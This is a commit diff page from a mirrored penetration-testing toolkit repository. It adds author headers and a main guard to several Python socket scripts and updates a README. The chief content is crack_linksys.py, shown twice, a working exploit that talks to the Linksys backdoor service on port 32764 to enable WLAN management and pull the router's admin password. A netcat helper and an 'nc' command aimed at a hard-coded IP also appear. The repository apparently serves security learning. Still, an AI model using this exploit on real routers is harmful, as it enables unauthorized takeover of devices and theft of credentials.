Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 02:59:08 -04:00
Code Issues Packages Projects Releases Wiki Activity

socket adds

Browse Source
This commit is contained in:
Mari Wahl 2014-12-16 11:43:30 -05:00
parent 5f1dc0b4c4
commit d01824f424
7 changed files with 66 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
Network_and_802.11/802.11/crack_linksys.py
View File

@ -1,3 +1,8 @@
#!/usr/bin/env python
__author__ = "bt3"
import socket import socket
import struct import struct
import sys import sys
@ -7,23 +12,33 @@ HOST = '192.168.33.1'
PORT = 32764 PORT = 32764
def send_message(s, message, payload=''): def send_message(s, message, payload=''):
header = struct.pack('<III', 0x53634D4D, message, len(payload)) header = struct.pack('<III', 0x53634D4D, message, len(payload))
s.send(header+payload) s.send(header+payload)
response = s.recv(0xC) response = s.recv(0xC)
if len(response) != 12: if len(response) != 12:
print("Device is not a crackable Linksys router.") print("Device is not a crackable Linksys router.")
print("Recieved invalid response: %s" % response) print("Recieved invalid response: %s" % response)
raise sys.exit(1) raise sys.exit(1)
sig, ret_val, ret_len = struct.unpack('<III', response) sig, ret_val, ret_len = struct.unpack('<III', response)
assert(sig == 0x53634D4D) assert(sig == 0x53634D4D)
if ret_val != 0: if ret_val != 0:
return ret_val, "ERROR" return ret_val, "ERROR"
ret_str = "" ret_str = ""
while len(ret_str) < ret_len: while len(ret_str) < ret_len:
ret_str += s.recv(ret_len-len(ret_str)) ret_str += s.recv(ret_len - len(ret_str))
return ret_val, ret_str return ret_val, ret_str
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT)) if __name__ == '__main__':
send_message(s, 3, "wlan_mgr_enable=1")
print send_message(s, 2, "http_password") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
send_message(s, 3, "wlan_mgr_enable=1")
print send_message(s, 2, "http_password")

11
Network_and_802.11/README.md
View File

@ -20,14 +20,23 @@
### socket ### socket
- Several scripts with Python's **socket** module: - Several scripts with Python's **socket** module:
* netcat
* cracking linksys
* reading socket
* TCP Client * TCP Client
* TCP Server * TCP Server
* UDP Client * UDP Client
### telnetlib
- Example of a script to create a telnet connection with Python's **telnetlib** module.
### scapy ### scapy
- Example scripts with Python's **scapy** module: - Several scripts with Python's **scapy** module:
* traceroute

25
Network_and_802.11/socket/crack_linksys.py
View File

@ -1,3 +1,8 @@
#!/usr/bin/env python
__author__ = "bt3"
import socket import socket
import struct import struct
import sys import sys
@ -7,23 +12,33 @@ HOST = '192.168.33.1'
PORT = 32764 PORT = 32764
def send_message(s, message, payload=''): def send_message(s, message, payload=''):
header = struct.pack('<III', 0x53634D4D, message, len(payload)) header = struct.pack('<III', 0x53634D4D, message, len(payload))
s.send(header+payload) s.send(header+payload)
response = s.recv(0xC) response = s.recv(0xC)
if len(response) != 12: if len(response) != 12:
print("Device is not a crackable Linksys router.") print("Device is not a crackable Linksys router.")
print("Recieved invalid response: %s" % response) print("Recieved invalid response: %s" % response)
raise sys.exit(1) raise sys.exit(1)
sig, ret_val, ret_len = struct.unpack('<III', response) sig, ret_val, ret_len = struct.unpack('<III', response)
assert(sig == 0x53634D4D) assert(sig == 0x53634D4D)
if ret_val != 0: if ret_val != 0:
return ret_val, "ERROR" return ret_val, "ERROR"
ret_str = "" ret_str = ""
while len(ret_str) < ret_len: while len(ret_str) < ret_len:
ret_str += s.recv(ret_len-len(ret_str)) ret_str += s.recv(ret_len - len(ret_str))
return ret_val, ret_str return ret_val, ret_str
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT)) if __name__ == '__main__':
send_message(s, 3, "wlan_mgr_enable=1")
print send_message(s, 2, "http_password") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
send_message(s, 3, "wlan_mgr_enable=1")
print send_message(s, 2, "http_password")

12
Network_and_802.11/socket/netcat.py
View File

@ -1,31 +1,35 @@
#!/usr/bin/env python #!/usr/bin/env python
__author__ = "bt3"
__author__ = "bt3gl"
import socket import socket
PORT = 12345
HOSTNAME = '54.209.5.48'
def netcat(hostname, port, content): def netcat(hostname, port, content):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port)) s.connect((hostname, port))
s.sendall(content) s.sendall(content)
s.shutdown(socket.SHUT_WR) s.shutdown(socket.SHUT_WR)
adata = [] adata = []
while 1: while 1:
data = s.recv(1024) data = s.recv(1024)
if data == "": if data == "":
break break
adata.append(data) adata.append(data)
s.close() s.close()
return adata return adata
if __name__ == '__main__': if __name__ == '__main__':
PORT = 12345
HOSTNAME = '54.209.5.48'
message = netcat(HOSTNAME, PORT, '')[1] message = netcat(HOSTNAME, PORT, '')[1]
print message print message

4
Network_and_802.11/socket/reading_socket.py
View File

@ -1,7 +1,6 @@
#!/usr/bin/env python #!/usr/bin/env python
__author__ = "bt3"
__author__ = "bt3gl"
import os import os
@ -50,7 +49,6 @@ def ntext():
def main(): def main():
SHELL_COMMAND = "nc 54.209.5.48 12345" SHELL_COMMAND = "nc 54.209.5.48 12345"

6
Network_and_802.11/socket/tcp_client.py Normal file
View File

@ -0,0 +1,6 @@
#!/usr/bin/env python
__author__ = "bt3"
import socket

3
Network_and_802.11/socket/reading_telnet.py → Network_and_802.11/telnetlib/reading_telnet.py
View File

@ -1,7 +1,6 @@
#!/usr/bin/env python #!/usr/bin/env python
__author__ = "bt3"
__author__ = "bt3gl"
from telnetlib import Telnet from telnetlib import Telnet